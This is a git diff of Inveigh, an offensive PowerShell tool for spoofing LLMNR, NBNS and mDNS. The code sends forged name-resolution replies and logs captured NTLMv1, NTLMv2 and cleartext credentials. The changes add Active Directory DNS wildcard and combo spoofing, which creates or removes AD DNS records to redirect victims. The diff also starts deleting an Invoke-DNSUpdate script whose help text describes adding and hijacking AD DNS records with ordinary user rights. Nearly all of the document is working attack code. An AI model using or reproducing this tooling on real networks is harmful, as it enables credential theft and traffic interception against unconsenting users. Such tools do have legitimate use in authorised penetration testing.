- $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and
- $destination_IP.IPAddressToString -ne $IP)
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and (
+ $Evade -and $destination_IP.IPAddressToString -ne $IP))
{
if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
@@ -2844,19 +3830,7 @@ $sniffer_scriptblock =
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
- $LLMNR_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
- $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $LLMNR_response_message = "[Response Sent]"
}
else
{
@@ -2876,6 +3850,28 @@ $sniffer_scriptblock =
if(!$LLMNR_request_ignore)
{
$inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($LLMNR_query_string))
+ {
+ $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$LLMNR_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
}
@@ -3000,19 +3996,7 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- $LLMNR_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
- $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $LLMNR_response_message = "[Response Sent]"
}
else
{
@@ -3022,6 +4006,28 @@ $LLMNR_spoofer_scriptblock =
if($LLMNR_request_data)
{
$inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($LLMNR_query_string))
+ {
+ $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$LLMNR_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
$LLMNR_request_data = ""
@@ -3082,7 +4088,7 @@ $mDNS_spoofer_scriptblock =
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
- $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
$mDNS_response_type = "[+]"
@@ -3099,7 +4105,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -3126,7 +4132,7 @@ $mDNS_spoofer_scriptblock =
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
- $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
$mDNS_response_type = "[+]"
@@ -3143,7 +4149,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -3296,19 +4302,7 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- $NBNS_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
- $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $NBNS_response_message = "[Response Sent]"
}
else
{
@@ -3320,6 +4314,28 @@ $NBNS_spoofer_scriptblock =
if($NBNS_request_data)
{
$inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($NBNS_query_string))
+ {
+ $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$NBNS_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
$NBNS_request_data = ""
@@ -3419,9 +4435,8 @@ $NBNS_bruteforce_spoofer_scriptblock =
# Control Loop ScriptBlock
$control_scriptblock =
{
- param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
-
- $inveigh.control = $true
+ param ($ADIDNSCredential,$ADIDNSDomain,$ADIDNSDomainController,$ADIDNSHostsIgnore,$ADIDNSIP,$ADIDNSPartition,
+ $ADIDNSThreshold,$ADIDNSTTL,$ADIDNSZone,$ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
function OutputQueueLoop
{
@@ -3445,10 +4460,10 @@ $control_scriptblock =
}
- function StopInveigh
+ function Stop-InveighRunspace
{
- param ([String]$exit_message)
-
+ param ([String]$Message)
+
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
@@ -3472,49 +4487,77 @@ $control_scriptblock =
}
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.DNS_table.Count -gt 0)
{
- foreach($DNS_host in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS_host.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
+ try
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $DNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ $inveigh.DNS_table.$DNS_host = ""
}
- else
+ catch
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $DNS_host remove failed") > $null
}
}
}
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.relay_running = $false
-
}
if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.running = $false
@@ -3523,6 +4566,11 @@ $control_scriptblock =
$inveigh.HTTPS = $false
}
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+ Invoke-ADIDNSSpoofer -Credential $ADIDNSCredential -Data $ADIDNSIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -TTL $ADIDNSTTL -Zone $ADIDNSZone
+ }
+
if($NBNSBruteForcePause)
{
$NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause
@@ -3556,7 +4604,7 @@ $control_scriptblock =
if($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)
{
- StopInveigh "run count"
+ Stop-InveighRunspace "run count"
}
}
@@ -3566,11 +4614,28 @@ $control_scriptblock =
if($control_stopwatch.Elapsed -ge $control_timeout)
{
- StopInveigh "run time"
+ Stop-InveighRunspace "run time"
}
}
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.request_table_updated)
+ {
+
+ try
+ {
+ Invoke-ADIDNSCheck -Credential $ADIDNSCredential -Data $ADIDNSIP -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Ignore $ADIDNSHostsIgnore -Partition $ADIDNSPartition -RequestTable $inveigh.request_table -Threshold $ADIDNSThreshold -TTL $ADIDNSTTL -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ $inveigh.request_table_updated = $false
+ }
+
if($inveigh.file_output)
{
@@ -3618,13 +4683,19 @@ $control_scriptblock =
OutputQueueLoop
Start-Sleep -m 5
+
+ if($inveigh.stop)
+ {
+ $inveigh.console_queue.Clear()
+ Stop-InveighRunspace
+ }
+
}
- $inveigh.control = $false
}
-# End ScriptBlocks
-# Begin Startup Functions
+#endregion
+#region begin startup functions
# HTTP Listener Startup Function
function HTTPListener
@@ -3696,30 +4767,15 @@ function ProxyListener
# Sniffer/Spoofer Startup Function
function SnifferSpoofer
{
-
- if($inveigh.DNS)
- {
- $sniffer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $sniffer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace($sniffer_initial_session_state)
- }
- else
- {
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
$sniffer_runspace.Open()
$sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$sniffer_powershell = [PowerShell]::Create()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($DNS_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($DNSHostsIgnore).AddArgument(
- $DNSThreshold).AddArgument($DNSTTL).AddArgument($Evade).AddArgument($IP).AddArgument($LLMNR).AddArgument(
- $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
+ $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($Evade).AddArgument($IP).AddArgument(
+ $LLMNR).AddArgument($LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
$mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
$NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
$SMB).AddArgument($SpooferHostsIgnore).AddArgument($SpooferHostsReply).AddArgument(
@@ -3731,27 +4787,12 @@ function SnifferSpoofer
# Unprivileged LLMNR Spoofer Startup Function
function LLMNRSpoofer
{
-
- if($inveigh.DNS)
- {
- $LLMNR_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $LLMNR_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace($LLMNR_spoofer_initial_session_state)
- }
- else
- {
- $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$LLMNR_spoofer_runspace.Open()
$LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $LLMNR_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
@@ -3768,7 +4809,6 @@ function mDNSSpoofer
$mDNS_spoofer_powershell = [PowerShell]::Create()
$mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
$mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $mDNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -3779,27 +4819,12 @@ function mDNSSpoofer
# Unprivileged NBNS Spoofer Startup Function
function NBNSSpoofer
{
-
- if($inveigh.DNS)
- {
- $NBNS_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $NBNS_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
- $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace($NBNS_spoofer_initial_session_state)
- }
- else
- {
- $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_spoofer_runspace.Open()
$NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $NBNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
@@ -3825,32 +4850,23 @@ function NBNSBruteForceSpoofer
# Control Loop Startup Function
function ControlLoop
{
- if($inveigh.DNS)
- {
- $control_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
- $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
- $control_initial_session_state.Commands.Add($DNS_update_function_entry)
- $control_runspace = [RunspaceFactory]::CreateRunspace($control_initial_session_state)
- }
- else
- {
- $control_runspace = [RunspaceFactory]::CreateRunspace()
- }
-
+ $control_runspace = [RunspaceFactory]::CreateRunspace()
$control_runspace.Open()
$control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$control_powershell = [PowerShell]::Create()
$control_powershell.Runspace = $control_runspace
$control_powershell.AddScript($shared_basic_functions_scriptblock) > $null
- $control_powershell.AddScript($control_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
+ $control_powershell.AddScript($ADIDNS_functions_scriptblock) > $null
+ $control_powershell.AddScript($control_scriptblock).AddArgument($ADIDNSCredential).AddArgument(
+ $ADIDNSDomain).AddArgument($ADIDNSDomainController).AddArgument($ADIDNSHostsIgnore).AddArgument(
+ $ADIDNSIP).AddArgument($ADIDNSPartition).AddArgument($ADIDNSThreshold).AddArgument(
+ $ADIDNSTTL).AddArgument($ADIDNSZone).AddArgument($ConsoleQueueLimit).AddArgument(
$NBNSBruteForcePause).AddArgument($RunCount).AddArgument($RunTime) > $null
$control_powershell.BeginInvoke() > $null
}
-# End Startup Functions
-
-# Startup Enabled Services
+#endregion
+#region begin startup enabled services
# HTTP Server Start
if($HTTP -eq 'Y')
@@ -4147,8 +5163,8 @@ finally
}
}
-#End Invoke-Inveigh
-
+#endregion
+#region begin support functions
function Stop-Inveigh
{
<#
@@ -4156,76 +5172,40 @@ function Stop-Inveigh
Stop-Inveigh will stop all running Inveigh functions.
#>
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
+ if($inveigh)
{
-
- if($inveigh.DNS_list.Count -gt 0)
+ $inveigh.stop = $true
+
+ if($inveigh.running -or $inveigh.relay_running)
{
-
- foreach($DNS_host in $inveigh.DNS_list)
+ $inveigh.console_queue.Clear()
+ Watch-Inveigh -NoConsoleMessage
+ <#
+ if($inveigh.relay_running)
{
-
- if($DNS_host.StartsWith("1,"))
- {
-
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
- {
- $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
- Write-Output $output
- }
- else
- {
- $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
- Write-Warning $output
- }
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
}
- }
-
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- }
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
+ if($inveigh.log_output)
{
- $certificate_store.Remove($certificate)
+ $inveigh.log.Add($output) > $null
}
- $certificate_store.Close()
- }
- catch
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
{
- $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- $output | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
@@ -4233,59 +5213,23 @@ if($inveigh)
$inveigh.log.Add($output) > $null
}
- Write-Warning $output
+ #Write-Output $output
+ $inveigh.running = $false
}
+ $inveigh.HTTPS = $false
+ #>
+ Start-Sleep -S 5
}
-
- if($inveigh.relay_running)
- {
- $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.relay_running = $false
- }
-
- if($inveigh.running)
+ else
{
- $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.running = $false
+ Write-Output "[-] There are no running Inveigh functions"
}
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
- }
- else
- {
- Write-Output "[-] There are no running Inveigh functions"
}
}
-}
-
function Get-Inveigh
{
<#
@@ -4404,12 +5348,12 @@ Get relay session list.
if($DNS)
{
- foreach($DNS in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- Write-Output $DNS.Substring(2)
+ Write-Output $DNS_host
}
}
@@ -4419,12 +5363,12 @@ Get relay session list.
if($DNSFailed)
{
- foreach($DNS in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS.StartsWith("0,"))
+ if($inveigh.DNS_table.$DNS_host -eq 0)
{
- Write-Output $DNS.Substring(2)
+ Write-Output $DNS_host
}
}
@@ -4555,7 +5499,8 @@ Watch-Inveigh will enabled real time console output. If using this function thro
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(Mandatory=$false)][Switch]$NoConsoleMessage,
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium","Y")][String]$ConsoleOutput = "Y",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -4564,7 +5509,11 @@ if($inveigh.tool -ne 1)
if($inveigh.running -or $inveigh.relay_running)
{
- Write-Output "[*] Press any key to stop real time console output"
+ if(!$NoConsoleMessage)
+ {
+ Write-Output "[*] Press any key to stop real time console output"
+ }
+
$inveigh.console_output = $true
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
@@ -4661,4 +5610,6 @@ if($inveigh)
}
+#endregion
+
} \ No newline at end of file
diff --git a/Invoke-DNSUpdate.ps1 b/Invoke-DNSUpdate.ps1
deleted file mode 100644
index 658d486..0000000
--- a/Invoke-DNSUpdate.ps1
+++ /dev/null
@@ -1,1437 +0,0 @@
-function Invoke-DNSUpdate
-{
- <#
- .SYNOPSIS
- This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication
- for secure updates is performed through Kerberos GSS-TSIG.
-
- Author: Kevin Robertson (@kevin_robertson)
- License: BSD 3-Clause
-
- .DESCRIPTION
- This function can be used to add/delete dynamic DNS records through secure or nonsecure dynamic updates against an
- AD domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled
- after BIND`s nsupdate tool when using the '-g' or 'gsstsig' options for secure updates or no authentication for
- nonsecure updates.
-
- By default, Active Directory-integrated zones have secure dynamic updates enabled with authenticated users having
- 'Create all child objects' permission. Records that do not exist in an AD zone can be added/deleted with a standard
- user account. Existing records created by default or created by other users impose limitations. For example, creating
- records that apply to the root of the zone or creating additional SRV records for kerberos/ldap will likely be blocked
- due to existing records. Note however that older existing dynamic records can sometimes be hijacked. Subdomain folders
- can also be created.
-
- With secure dynamic updates, this function supports only GSS-TSIG through Kerberos AES256-CTS-HMAC-SHA1-96 using
- two separate methods. By default, the function will have Windows perform all Kerberos steps up until the AP-REQ
- is sent to DNS on the DC. This method will work with either the current session context or with specified credentials.
- The second method performs Kerberos authentication using just PowerShell code over a TCPClient connection. This method
- will accept a password or AES256 hash and will not place any tickets in the client side cache.
-
- In the event that a zone is configured for nonsecure dynamic updates, you should have full control over the zone.
-
- Note that wpad and isatap are on a block list by default starting with Server 2008. Although the records can be added
- with both secure and nonsecure dynamic updates, AD DNS will not answer requests for wpad and isatap if they are listed
- on the block list.
-
- .PARAMETER DomainController
- Domain controller to target in FQDN format.
-
- .PARAMETER Realm
- Kerberos realm.
-
- .PARAMETER Username
- Username of user with DNS secure dynamic update access. If using a machine account, the trailing '$' must be
- included.
-
- .PARAMETER Password
- Password of user with DNS secure dynamic update access. The password must be in the form of a secure string.
-
- .PARAMETER Hash
- AES256 password hash for user with DNS secure dynamic update access. Note that this will use Kerberos
- authentication built on top of TCPClient.
-
- .PARAMETER Security
- Default = Secure: (Auto/Nonsecure/Secure) Dynamic update security type. Auto will attempt to use nonsecure. If
- nonsecure fails, secure will be used. This is the standard dynamic update behavior. Secure is the default
- because it generates less traffic.
-
- .PARAMETER DNSName
- DNS record name.
-
- .PARAMETER DNSData
- DNS records data. For most record types this will be the destination hostname or IP address. For TXT records
- this can be used for data. If deleting a record, leave off this parameter.
-
- .PARAMETER DNSType
- DNS record type.
-
- .PARAMETER DNSTTL
- DNS record TTL.
-
- .PARAMETER DNSPreference
- DNS MX record priority
-
- .PARAMETER DNSPriority
- DNS SRV record priority.
-
- .PARAMETER DNSWeight
- DNS SRV record weight.
-
- .PARAMETER DNSPort
- DNS SRV record port.
-
- .PARAMETER DNSZone
- DNS zone.
-
- .PARAMETER TCPClientAuth
- Switch to force usage of the TCPClient based Kerberos authentication.
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType A -DNSName www.test.local -DNSData 192.168.100.125 -DNSTTL 84600
- Add A Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType AAAA -DNSName www.test.local -DNSData 2001:0db8:85a3:0000:0000:8a2e:0370:7334
- Add AAAA Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType CNAME -DNSName www.test.local -DNSData system.test.local
- Add CNAME Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType MX -DNSName test.local -DNSData 192.168.100.125 -DNSPreference 10
- Add MX Record
-
- .EXAMPLE
- Invoke-DNSUpdate -DNSType PTR -DNSName 125.100.168.192.in-addr.arpa -DNSData www.test.local -DNSZone 100.168.192.in-addr.arpa
- Add PTR Record - there is a good chance this will be denied if there is an existing record for an IP
-
- .EXAMPLE
